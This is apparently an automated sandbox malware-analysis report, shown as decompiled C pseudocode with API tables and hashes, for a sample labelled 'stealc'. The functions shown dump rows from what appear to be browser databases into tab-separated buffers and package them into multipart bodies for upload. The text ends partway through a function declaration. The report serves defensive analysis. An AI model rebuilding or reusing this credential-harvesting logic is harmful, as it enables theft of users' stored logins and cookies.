              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v84, _t523,  *0x38322c), _t417,  &_v16);
              							E00171839(_v84);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523,  *0x383034), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
              							E00171839(_v28);
              							_t373 =  *0x383658(_v96);
              							_t408 = _v16;
              							_t435 = _t373 + _v32 +  *0x383658(_t408);
              							_t376 = RtlAllocateHeap(GetProcessHeap(), 0, _t435);
              							_v48 = _t376;
              							memcpy(_v48, _t408,  *0x383658(_t408));
              							memcpy(_v48 +  *0x383658(_v32), _t408, _v40);
              							memcpy(_v48 +  *0x383658( *0x383658(_v96)) + _v32, _t408, _v96);
              							_t387 =  *0x383658(_v108, _v48, _t435);
              							_t409 = _v52;
              							 *0x383748(_t409, _v108, _t387);
              							_v52 =  &_v48;
              							memset(_v52, 0, 4 << 0);
              							_t512 = _t512 + 0x30;
              							while(1) {
              								_push( &_v52);
              								_push(0x7cf);
              								_push( &_v2264);
              								_push(_t409);
              								if( *0x3836b8() == 0) {
              									break;
              								}
              								_t395 = _v52;
              								__eflags = _t395;
              								if(__eflags != 0) {
              									 *((char*)(_t507 + _t395 - 0x8d4)) = 0;
              									E0017EA2F(E0017EAAB(_a4, 0,  &_v144, __eflags,  &_v2264), 0, _a4);
              									E00171839(_v144);
              									continue;
              								}
              								break;
              							}
              							 *0x383690(_t409);
              						}
              						 *0x383690(_v56);
              					}
              				}
              				 *0x383690(_v60);
              				_v56 =  &_v40;
              				memset(_v56, 0, 4 << 0);
              				_v56 =  &_v36;
              				memset(_v56, 0, 4 << 0);
              				E00171839(_v72);
              				E00171839(_v16);
              				E00171839(_v96);
              				E00171839(_v108);
              				E00171839(0);
              				E00171839(0);
              				E00171839(0);
              				E00171839(0);
              				E001716AC( &_a8);
              				E00171839(_a88);
              				return _a4;
              			}

















































              0x00173786
              0x00173792
              0x0017379a
              0x001737a6
              0x001737ad
              0x001737b6
              0x001737be
              0x001737c7
              0x001737ca
              0x001737cd
              0x001737d0
              0x001737d3
              0x001737ee
              0x001737f6
              0x001737ff
              0x00173808
              0x00173811
              0x0017381a
              0x00173823
              0x0017382e
              0x00173834
              0x0017383a
              0x0017383d
              0x0017384b
              0x0017384d
              0x0017384d
              0x0017384e
              0x00173852
              0x0017385d
              0x00173864
              0x00173873
              0x0017387b
              0x00173883
              0x001738b6
              0x001738be
              0x001738c6
              0x001738d1
              0x001738f2
              0x001738fa
              0x00173902
              0x0017391e
              0x00173924
              0x00173929
              0x00173932
              0x00173956
              0x0017395c
              0x0017395f
              0x00173961
              0x0017397a
              0x00173982
              0x00173995
              0x0017399d
              0x001739a2
              0x001739b6
              0x001739be
              0x001739d7
              0x001739df
              0x001739f8
              0x00173a00
              0x00173a18
              0x00173a20
              0x00173a36
              0x00173a3e
              0x00173a52
              0x00173a5a
              0x00173a72
              0x00173a7a
              0x00173a90
              0x00173a98
              0x00173aac
              0x00173ab4
              0x00173acd
              0x00173ad5
              0x00173aee
              0x00173af6
              0x00173b0e
              0x00173b16
              0x00173b2c
              0x00173b34
              0x00173b48
              0x00173b50
              0x00173b68
              0x00173b70
              0x00173b83
              0x00173b8b
              0x00173b9f
              0x00173ba7
              0x00173bc0
              0x00173bc8
              0x00173be1
              0x00173be9
              0x00173c01
              0x00173c09
              0x00173c11
              0x00173c17
              0x00173c26
              0x00173c32
              0x00173c39
              0x00173c4d
              0x00173c63
              0x00173c83
              0x00173c8f
              0x00173c95
              0x00173c9d
              0x00173ca6
              0x00173cb3
              0x00173cb3
              0x00173cf3
              0x00173cf6
              0x00173cf7
              0x00173cfe
              0x00173cff
              0x00173d08
              0x00000000
              0x00000000
              0x00173cbc
              0x00173cbf
              0x00173cc1
              0x00173cc3
              0x00173ce3
              0x00173cee
              0x00000000
              0x00173cee
              0x00000000
              0x00173cc1
              0x00173d0b
              0x00173d0b
              0x00173d14
              0x00173d14
              0x00173929
              0x00173d1d
              0x00173d26
              0x00173d33
              0x00173d38
              0x00173d45
              0x00173d4a
              0x00173d52
              0x00173d5a
              0x00173d62
              0x00173d69
              0x00173d70
              0x00173d77
              0x00173d7e
              0x00173d86
              0x00173d8e
              0x00173d9a

              APIs
                • Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 0017312A
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 00173130
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 00173136
                • Part of subcall function 001730F8: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00173148
              • lstrlen.KERNEL32(?), ref: 001737DF
                • Part of subcall function 0017D912: GetProcessHeap.KERNEL32(00000000,?,?,001737D8,?,?,?,?,?,?,?), ref: 0017D93F
                • Part of subcall function 0017D912: RtlAllocateHeap.NTDLL(00000000,?,001737D8), ref: 0017D946
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
                • Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
                • Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2
                • Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F
                • Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
                • Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1
              • lstrlen.KERNEL32(?,",00181E44,------,00181E44,?,",00181E44,------,00181E44,",00181E44,------), ref: 00173C11
              • lstrlen.KERNEL32(?), ref: 00173C1D
              • GetProcessHeap.KERNEL32(00000000,?), ref: 00173C2B
              • RtlAllocateHeap.NTDLL(00000000), ref: 00173C32
              • lstrlen.KERNEL32(?), ref: 00173C3C
              • memcpy.MSVCRT ref: 00173C4D
              • lstrlen.KERNEL32(?,?,?), ref: 00173C59
              • memcpy.MSVCRT ref: 00173C63
              • lstrlen.KERNEL32(?), ref: 00173C6B
              • lstrlen.KERNEL32(?,?,00000000), ref: 00173C76
              • memcpy.MSVCRT ref: 00173C83
              • lstrlen.KERNEL32(?,?,?), ref: 00173C8F
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrlen$lstrcpy$Heap$mallocmemcpy$AllocateProcesslstrcat
              • String ID: ------$"$--$------
              • API String ID: 1086523722-1406108388
              • Opcode ID: 9aad13f7418c00f0aaf418ec9e7fddea7abc7da9d6e85e0d83ca1a00cf456dee
              • Instruction ID: f34ed61b7e3d60a4cde091b57983926fcabd4c455a868adcb3ae739ea8192b6e
              • Opcode Fuzzy Hash: 9aad13f7418c00f0aaf418ec9e7fddea7abc7da9d6e85e0d83ca1a00cf456dee
              • Instruction Fuzzy Hash: D302BA35D00219ABCF01FFA4EC469DDBBB9BF18304F5591A1B618B7161DB306E5ACB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 38%
              			E00175467(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, char _a52) {
              				void _v8;
              				char _v12;
              				char _v16;
              				char _v28;
              				char _v40;
              				char _v52;
              				char _v64;
              				char _v76;
              				char _v88;
              				char _v100;
              				char _v112;
              				char _v124;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t128;
              				void* _t149;
              				char* _t153;
              				void* _t185;
              				void* _t189;
              				void* _t190;
              				void* _t191;
              				void* _t212;
              				void* _t214;
              				void* _t216;
              				void* _t231;
              				intOrPtr* _t235;
              				void* _t252;
              				void* _t257;
              				char* _t263;
              				void* _t264;
              				void* _t265;
              				void* _t270;
              				void* _t282;
              				char* _t288;
              				char* _t301;
              				char* _t315;
              				char* _t316;
              				void* _t321;
              				void* _t322;
              				void* _t324;
              				void* _t325;
              
              				_t264 = __ecx;
              				if(E0017EAFF( &_a28,  *0x38328c) != 0) {
              					L2:
              					E0017E9EB(_t264,  &_a16, 0x17fbd9);
              					goto L4;
              				} else {
              					_t257 = E0017EAFF( &_a28,  *0x3832a4);
              					_t329 = _t257;
              					if(_t257 == 0) {
              						__eflags = E0017EAFF( &_a16,  *0x38343c);
              						if(__eflags == 0) {
              							L4:
              							E0017E990( &_v40, _t329, 0x17fbd9);
              							E0017EA2F(E0017EAAB( &_v40, _t264,  &_v112, _t329,  *0x3833c8), _t264,  &_v40);
              							E00171839(_v112);
              							_t128 = E0017D78F(0x17fbd9,  &_v100, _t329, 0x1a);
              							_pop(_t265);
              							E0017EA2F(E0017EA69( &_v40, _t265, _t128,  &_v112, _t329), _t265,  &_v40);
              							E00171839(_v112);
              							E00171839(_v100);
              							 *0x383610(_a4, _v40, 1);
              							E0017E990( &_v28, _t329, 0x17fbd9);
              							E0017EA2F(E0017EAAB( &_v28, _t265,  &_v112, _t329,  *0x3831b4), _t265,  &_v28);
              							E00171839(_v112);
              							E0017EA2F(E0017EAAB( &_v28, _t265,  &_v112, _t329, 0x17fbdc), _t265,  &_v28);
              							E00171839(_v112);
              							_t149 = E0017EA69( &_v28, _t265,  &_a28,  &_v112, _t329);
              							_t301 =  &_v28;
              							E0017EA2F(_t149, _t265, _t301);
              							E00171839(_v112);
              							_t153 = _t301;
              							_t330 = _a48;
              							if(_a48 == 0) {
              								E0017EA2F(E0017EAAB(_t153, _t265,  &_v112, __eflags, "_"), _t265,  &_v28);
              								E00171839(_v112);
              								E0017EA2F(E0017EAAB(E0017EA69( &_v28, _t265,  &_a16,  &_v100, __eflags), _t265,  &_v112, __eflags,  *0x383238), _t265,  &_v28);
              								E00171839(_v112);
              							} else {
              								E0017EA2F(E0017EAAB(_t153, _t265,  &_v100, _t330,  *0x383238), _t265,  &_v28);
              							}
              							E00171839(_v100);
              							_push( &_v16);
              							_push(_v40);
              							if( *0x38359c() == 0) {
              								_t185 =  *0x383558(_v16,  *0x383230, 0xffffffff,  &_v12, 0);
              								_t322 = _t321 + 0x14;
              								if(_t185 == 0) {
              									_t189 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff);
              									_v8 = _t189;
              									_t190 =  *0x383574(_v12);
              									_pop(_t270);
              									_t333 = _t190 - 0x64;
              									if(_t190 == 0x64) {
              										_t263 = "0";
              										_t288 = "\t";
              										do {
              											E0017E990( &_v112, _t333,  *0x383590(_v12, 0));
              											E0017E990( &_v64, _t333,  *0x383590(_v12, 1));
              											E0017E990( &_v100, _t333,  *0x383590(_v12, 2));
              											E0017E990( &_v52, _t333,  *0x383590(_v12, 3));
              											E0017E990( &_v76, _t333,  *0x383590(_v12, 4));
              											_t212 =  *0x383590(_v12, 5);
              											_pop(_t282);
              											E0017E990( &_v88, _t333, _t212);
              											_t214 =  *0x383754(_v64, _t263);
              											_t315 =  &_v64;
              											if(_t214 != 0) {
              												_push( *0x383048);
              											} else {
              												_push( *0x38331c);
              											}
              											E0017E9EB(_t282, _t315);
              											_t216 =  *0x383754(_v52);
              											_t316 =  &_v52;
              											if(_t216 != 0) {
              												_push( *0x383048);
              											} else {
              												_push( *0x38331c);
              											}
              											E0017E9EB(_t282, _t316);
              											if( *_v76 == 0x2d) {
              												E0017E9EB(_t282,  &_v76, _t263);
              											}
              											 *0x383730(_v8, _v112);
              											 *0x383730(_v8, _t288);
              											 *0x383730(_v8, _v64);
              											 *0x383730(_v8, _t288);
              											 *0x383730(_v8, _v100);
              											 *0x383730(_v8, _t288);
              											 *0x383730(_v8, _v52);
              											 *0x383730(_v8, _t288);
              											 *0x383730(_v8, _v76);
              											 *0x383730(_v8, _t288);
              											 *0x383730(_v8, _v88);
              											 *0x383730(_v8, _t288);
              											_t231 =  *0x383580(_v12, 6, _a40, _a44);
              											_t235 = E00174E50(_t231,  &_v124,  *0x383588(), _v12, 6);
              											_t322 = _t322 + 0x20;
              											 *0x383730(_v8,  *_t235);
              											E00171839(_v124);
              											 *0x383730(_v8, "\n");
              											E00171839(_v88);
              											E00171839(_v76);
              											E00171839(_v52);
              											E00171839(_v100);
              											E00171839(_v64);
              											E00171839(_v112);
              											_t252 =  *0x383574(_v12);
              											_pop(_t270);
              										} while (_t252 == 0x64);
              									}
              									_t191 =  *0x383658(_v8);
              									_t338 = _t191 - 5;
              									if(_t191 > 5) {
              										_push( *0x383658(_v8));
              										_push(_v8);
              										_t324 = _t322 - 0xc;
              										E0017E9C2( &_v28, _t270, _t324, _t338);
              										_t325 = _t324 - 0x50;
              										E001716CB( &_a52, _t325);
              										_push( &_v124);
              										E00173786(_t270, _t338);
              										_t322 = _t325 + 0x68;
              										E00171839(_v124);
              									}
              									memset( &_v8, 0, 4);
              								}
              								 *0x383578(_v12);
              								 *0x3835a0(_v16);
              							}
              							 *0x383664(_v40);
              							E00171839(_v40);
              							E00171839(_v28);
              							E00171839(0);
              							E00171839(0);
              						}
              					} else {
              						goto L2;
              					}
              				}
              				E00171839(_a4);
              				E00171839(_a16);
              				E00171839(_a28);
              				return E001716AC( &_a52);
              			}













































              0x00175467
              0x00175485
              0x00175499
              0x0017549d
              0x00000000
              0x00175487
              0x00175490
              0x00175495
              0x00175497
              0x001754b2
              0x001754b4
              0x001754ba
              0x001754be
              0x001754d7
              0x001754df
              0x001754e9
              0x001754f0
              0x001754ff
              0x00175507
              0x0017550f
              0x0017551c
              0x00175526
              0x00175541
              0x00175549
              0x00175561
              0x00175569
              0x00175577
              0x0017557c
              0x0017557f
              0x00175587
              0x0017558c
              0x0017558e
              0x00175591
              0x001755bb
              0x001755c3
              0x001755e7
              0x001755ef
              0x00175593
              0x001755a4
              0x001755a4
              0x001755f7
              0x001755ff
              0x00175600
              0x0017560d
              0x00175623
              0x00175629
              0x0017562e
              0x00175641
              0x0017564a
              0x0017564d
              0x00175653
              0x00175654
              0x00175657
              0x0017565d
              0x00175662
              0x00175667
              0x00175678
              0x0017568e
              0x001756a4
              0x001756ba
              0x001756d0
              0x001756da
              0x001756e1
              0x001756e6
              0x001756ef
              0x001756f5
              0x001756fa
              0x00175704
              0x001756fc
              0x001756fc
              0x001756fc
              0x0017570a
              0x00175713
              0x00175719
              0x0017571e
              0x00175728
              0x00175720
              0x00175720
              0x00175720
              0x0017572e
              0x00175739
              0x0017573f
              0x0017573f
              0x0017574a
              0x00175754
              0x00175760
              0x0017576a
              0x00175776
              0x00175780
              0x0017578c
              0x00175796
              0x001757a2
              0x001757ac
              0x001757b8
              0x001757c2
              0x001757d3
              0x001757f0
              0x001757f5
              0x001757fd
              0x00175806
              0x00175813
              0x0017581c
              0x00175824
              0x0017582c
              0x00175834
              0x0017583c
              0x00175844
              0x0017584c
              0x00175852
              0x00175853
              0x00175667
              0x0017585f
              0x00175865
              0x00175868
              0x00175873
              0x00175874
              0x0017587a
              0x0017587f
              0x00175884
              0x0017588c
              0x00175894
              0x00175895
              0x0017589d
              0x001758a0
              0x001758a0
              0x001758ad
              0x001758b3
              0x001758b9
              0x001758c3
              0x001758c9
              0x001758cd
              0x001758d6
              0x001758de
              0x001758e5
              0x001758ec
              0x001758ec
              0x00000000
              0x00000000
              0x00000000
              0x00175497
              0x001758f4
              0x001758fc
              0x00175904
              0x00175915

              APIs
              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0017563A
              • RtlAllocateHeap.NTDLL(00000000), ref: 00175641
              • lstrcat.KERNEL32(0017657D,?), ref: 0017574A
              • lstrcat.KERNEL32(0017657D,00181EC8), ref: 00175754
              • lstrcat.KERNEL32(0017657D,?), ref: 00175760
              • lstrcat.KERNEL32(0017657D,00181EC8), ref: 0017576A
              • lstrcat.KERNEL32(0017657D,?), ref: 00175776
              • lstrcat.KERNEL32(0017657D,00181EC8), ref: 00175780
              • lstrcat.KERNEL32(0017657D,?), ref: 0017578C
              • lstrcat.KERNEL32(0017657D,00181EC8), ref: 00175796
              • lstrcat.KERNEL32(0017657D,?), ref: 001757A2
              • lstrcat.KERNEL32(0017657D,00181EC8), ref: 001757AC
              • lstrcat.KERNEL32(0017657D,?), ref: 001757B8
              • lstrcat.KERNEL32(0017657D,00181EC8), ref: 001757C2
                • Part of subcall function 00174E50: memcmp.MSVCRT ref: 00174E6E
                • Part of subcall function 00174E50: memset.MSVCRT ref: 00174EA0
              • lstrcat.KERNEL32(0017657D,00000000), ref: 001757FD
              • lstrcat.KERNEL32(0017657D,00181EBC), ref: 00175813
              • lstrlen.KERNEL32(0017657D), ref: 0017585F
              • lstrlen.KERNEL32(0017657D), ref: 0017586D
              • memset.MSVCRT ref: 001758AD
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$Heaplstrlenmemset$AllocateProcessmemcmp
              • String ID:
              • API String ID: 3277701846-0
              • Opcode ID: eb50416356d0b4afec066348462f7542d2b2601c9a1181ea8069d0425f380ce9
              • Instruction ID: ccb09b0300ca654c420639a5c0753667688dab86abd8220f29f1f4c4d6cb185b
              • Opcode Fuzzy Hash: eb50416356d0b4afec066348462f7542d2b2601c9a1181ea8069d0425f380ce9
              • Instruction Fuzzy Hash: ACD1E472D00219EBCF02AFA4ED4A99D7BB9FF18704F5480A0F609B7171DB31AE169B51
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 34%
              			E00176CE3(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, char _a40) {
              				void _v8;
              				char _v12;
              				char _v16;
              				char _v28;
              				char _v40;
              				char _v52;
              				char _v64;
              				char _v76;
              				char _v88;
              				char _v100;
              				char _v112;
              				char _v124;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t115;
              				void* _t154;
              				long _t172;
              				void* _t176;
              				void* _t177;
              				void* _t178;
              				void* _t201;
              				void* _t203;
              				void* _t205;
              				void* _t235;
              				char* _t238;
              				void* _t239;
              				void* _t240;
              				void* _t245;
              				void* _t259;
              				char* _t265;
              				char* _t292;
              				char* _t293;
              				void* _t294;
              				void* _t295;
              				void* _t297;
              				void* _t298;
              
              				_t299 = __eflags;
              				_t239 = __ecx;
              				E0017E990( &_v40, __eflags, 0x17fbd9);
              				E0017EA2F(E0017EAAB( &_v40, _t239,  &_v124, __eflags,  *0x3833c8), _t239,  &_v40);
              				E00171839(_v124);
              				_t115 = E0017D78F(0x17fbd9,  &_v112, _t299, 0x1a);
              				_pop(_t240);
              				E0017EA2F(E0017EA69( &_v40, _t240, _t115,  &_v124, _t299), _t240,  &_v40);
              				E00171839(_v124);
              				E00171839(_v112);
              				 *0x383610(_a4, _v40, 1);
              				E0017E990( &_v28, _t299, 0x17fbd9);
              				E0017EA2F(E0017EAAB( &_v28, _t240,  &_v124, _t299,  *0x3831b4), _t240,  &_v28);
              				E00171839(_v124);
              				E0017EA2F(E0017EAAB( &_v28, _t240,  &_v124, _t299, 0x17fbdc), _t240,  &_v28);
              				E00171839(_v124);
              				E0017EA2F(E0017EA69( &_v28, _t240,  &_a28,  &_v124, _t299), _t240,  &_v28);
              				E00171839(_v124);
              				E0017EA2F(E0017EAAB( &_v28, _t240,  &_v124, _t299, "_"), _t240,  &_v28);
              				E00171839(_v124);
              				E0017EA2F(E0017EAAB(E0017EA69( &_v28, _t240,  &_a16,  &_v112, _t299), _t240,  &_v124, _t299,  *0x383238), _t240,  &_v28);
              				E00171839(_v124);
              				E00171839(_v112);
              				_t154 =  *0x38359c(_a4,  &_v16);
              				if(_t154 == 0) {
              					_t172 =  *0x383558(_v16,  *0x383140, 0xffffffff,  &_v12, _t154);
              					_t295 = _t294 + 0x14;
              					if(_t172 == 0) {
              						_t176 = RtlAllocateHeap(GetProcessHeap(), _t172, 0x5f5e0ff);
              						_v8 = _t176;
              						_t177 =  *0x383574(_v12);
              						_pop(_t245);
              						_t302 = _t177 - 0x64;
              						if(_t177 == 0x64) {
              							_t238 = "0";
              							_t265 = "\t";
              							do {
              								E0017E990( &_v124, _t302,  *0x383590(_v12, 0));
              								E0017E990( &_v64, _t302,  *0x383590(_v12, 1));
              								E0017E990( &_v112, _t302,  *0x383590(_v12, 2));
              								E0017E990( &_v52, _t302,  *0x383590(_v12, 3));
              								E0017E990( &_v100, _t302,  *0x383590(_v12, 4));
              								E0017E990( &_v88, _t302,  *0x383590(_v12, 5));
              								_t201 =  *0x383590(_v12, 6);
              								_pop(_t259);
              								E0017E990( &_v76, _t302, _t201);
              								_t203 =  *0x383754(_v64, _t238);
              								_t292 =  &_v64;
              								if(_t203 != 0) {
              									_push( *0x383048);
              								} else {
              									_push( *0x38331c);
              								}
              								E0017E9EB(_t259, _t292);
              								_t205 =  *0x383754(_v52);
              								_t293 =  &_v52;
              								if(_t205 != 0) {
              									_push( *0x383048);
              								} else {
              									_push( *0x38331c);
              								}
              								E0017E9EB(_t259, _t293);
              								 *0x383730(_v8, _v124);
              								 *0x383730(_v8, _t265);
              								 *0x383730(_v8, _v64);
              								 *0x383730(_v8, _t265);
              								 *0x383730(_v8, _v112);
              								 *0x383730(_v8, _t265);
              								 *0x383730(_v8, _v52);
              								 *0x383730(_v8, _t265);
              								 *0x383730(_v8, _v100);
              								 *0x383730(_v8, _t265);
              								 *0x383730(_v8, _v88);
              								 *0x383730(_v8, _t265);
              								 *0x383730(_v8, _v76);
              								 *0x383730(_v8, "\n");
              								E00171839(_v76);
              								E00171839(_v88);
              								E00171839(_v100);
              								E00171839(_v52);
              								E00171839(_v112);
              								E00171839(_v64);
              								E00171839(_v124);
              								_t235 =  *0x383574(_v12);
              								_pop(_t245);
              							} while (_t235 == 0x64);
              						}
              						_t178 =  *0x383658(_v8);
              						_t306 = _t178 - 5;
              						if(_t178 > 5) {
              							_push( *0x383658(_v8));
              							_push(_v8);
              							_t297 = _t295 - 0xc;
              							E0017E9C2( &_v28, _t245, _t297, _t306);
              							_t298 = _t297 - 0x50;
              							E001716CB( &_a40, _t298);
              							_push( &_v124);
              							E00173786(_t245, _t306);
              							_t295 = _t298 + 0x68;
              							E00171839(_v124);
              						}
              						memset( &_v8, 0, 4);
              					}
              					 *0x383578(_v12);
              					 *0x3835a0(_v16);
              				}
              				 *0x383664(_v40);
              				E00171839(_v40);
              				E00171839(_v28);
              				E00171839(0);
              				E00171839(0);
              				E00171839(_a4);
              				E00171839(_a16);
              				E00171839(_a28);
              				return E001716AC( &_a40);
              			}








































              0x00176ce3
              0x00176ce3
              0x00176cf5
              0x00176d0e
              0x00176d16
              0x00176d20
              0x00176d27
              0x00176d36
              0x00176d3e
              0x00176d46
              0x00176d53
              0x00176d5d
              0x00176d76
              0x00176d7e
              0x00176d96
              0x00176d9e
              0x00176db4
              0x00176dbc
              0x00176dd4
              0x00176ddc
              0x00176e00
              0x00176e08
              0x00176e10
              0x00176e1c
              0x00176e26
              0x00176e3c
              0x00176e42
              0x00176e47
              0x00176e5a
              0x00176e63
              0x00176e66
              0x00176e6c
              0x00176e6d
              0x00176e70
              0x00176e76
              0x00176e7b
              0x00176e80
              0x00176e91
              0x00176ea7
              0x00176ebd
              0x00176ed3
              0x00176ee9
              0x00176eff
              0x00176f09
              0x00176f10
              0x00176f15
              0x00176f1e
              0x00176f24
              0x00176f29
              0x00176f33
              0x00176f2b
              0x00176f2b
              0x00176f2b
              0x00176f39
              0x00176f42
              0x00176f48
              0x00176f4d
              0x00176f57
              0x00176f4f
              0x00176f4f
              0x00176f4f
              0x00176f5d
              0x00176f68
              0x00176f72
              0x00176f7e
              0x00176f88
              0x00176f94
              0x00176f9e
              0x00176faa
              0x00176fb4
              0x00176fc0
              0x00176fca
              0x00176fd6
              0x00176fe0
              0x00176fec
              0x00176ffa
              0x00177003
              0x0017700b
              0x00177013
              0x0017701b
              0x00177023
              0x0017702b
              0x00177033
              0x0017703b
              0x00177041
              0x00177042
              0x00176e80
              0x0017704e
              0x00177054
              0x00177057
              0x00177062
              0x00177063
              0x00177069
              0x0017706e
              0x00177073
              0x0017707b
              0x00177083
              0x00177084
              0x0017708c
              0x0017708f
              0x0017708f
              0x0017709c
              0x001770a2
              0x001770a8
              0x001770b1
              0x001770b8
              0x001770bc
              0x001770c5
              0x001770cd
              0x001770d4
              0x001770db
              0x001770e3
              0x001770eb
              0x001770f3
              0x00177104

              APIs
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
                • Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
                • Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2
                • Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F
                • Part of subcall function 0017D78F: GetSystemTime.KERNEL32(?,0017FBD9,00000000,?,?,?,?,?,?,?,00173219,00000014), ref: 0017D7B4
                • Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
                • Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1
              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00176E53
              • RtlAllocateHeap.NTDLL(00000000), ref: 00176E5A
              • lstrcat.KERNEL32(00177782,?), ref: 00176F68
              • lstrcat.KERNEL32(00177782,00181EC8), ref: 00176F72
              • lstrcat.KERNEL32(00177782,?), ref: 00176F7E
              • lstrcat.KERNEL32(00177782,00181EC8), ref: 00176F88
              • lstrcat.KERNEL32(00177782,?), ref: 00176F94
              • lstrcat.KERNEL32(00177782,00181EC8), ref: 00176F9E
              • lstrcat.KERNEL32(00177782,?), ref: 00176FAA
              • lstrcat.KERNEL32(00177782,00181EC8), ref: 00176FB4
              • lstrcat.KERNEL32(00177782,?), ref: 00176FC0
              • lstrcat.KERNEL32(00177782,00181EC8), ref: 00176FCA
              • lstrcat.KERNEL32(00177782,?), ref: 00176FD6
              • lstrcat.KERNEL32(00177782,00181EC8), ref: 00176FE0
              • lstrcat.KERNEL32(00177782,?), ref: 00176FEC
              • lstrcat.KERNEL32(00177782,00181EBC), ref: 00176FFA
              • lstrlen.KERNEL32(00177782), ref: 0017704E
              • lstrlen.KERNEL32(00177782), ref: 0017705C
              • memset.MSVCRT ref: 0017709C
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocateProcessSystemTimememset
              • String ID:
              • API String ID: 245975372-0
              • Opcode ID: b6b4a327c3b4355e6dfad95de05525ab6e216c96594a082bccced9743657e823
              • Instruction ID: 5dd4dd52589b6105bca513bdcae45158dbe35cfa217af049daa38d2b00ba08e1
              • Opcode Fuzzy Hash: b6b4a327c3b4355e6dfad95de05525ab6e216c96594a082bccced9743657e823
              • Instruction Fuzzy Hash: B9C1E372D04219EBDF02ABA4ED0A9DDBBB9FF18704F1480A5F609B3171DB316E569B40
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E00173D9B(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a88) {
              				void* _v16;
              				char _v28;
              				signed int _v32;
              				void* _v36;
              				char _v40;
              				char _v44;
              				char _v56;
              				int _v68;
              				intOrPtr _v72;
              				char _v84;
              				char _v96;
              				char _v108;
              				intOrPtr _v124;
              				intOrPtr _v144;
              				intOrPtr _v152;
              				intOrPtr _v164;
              				void _v168;
              				char _v368;
              				char _v428;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t168;
              				intOrPtr _t175;
              				void* _t179;
              				void* _t204;
              				void* _t245;
              				signed int _t250;
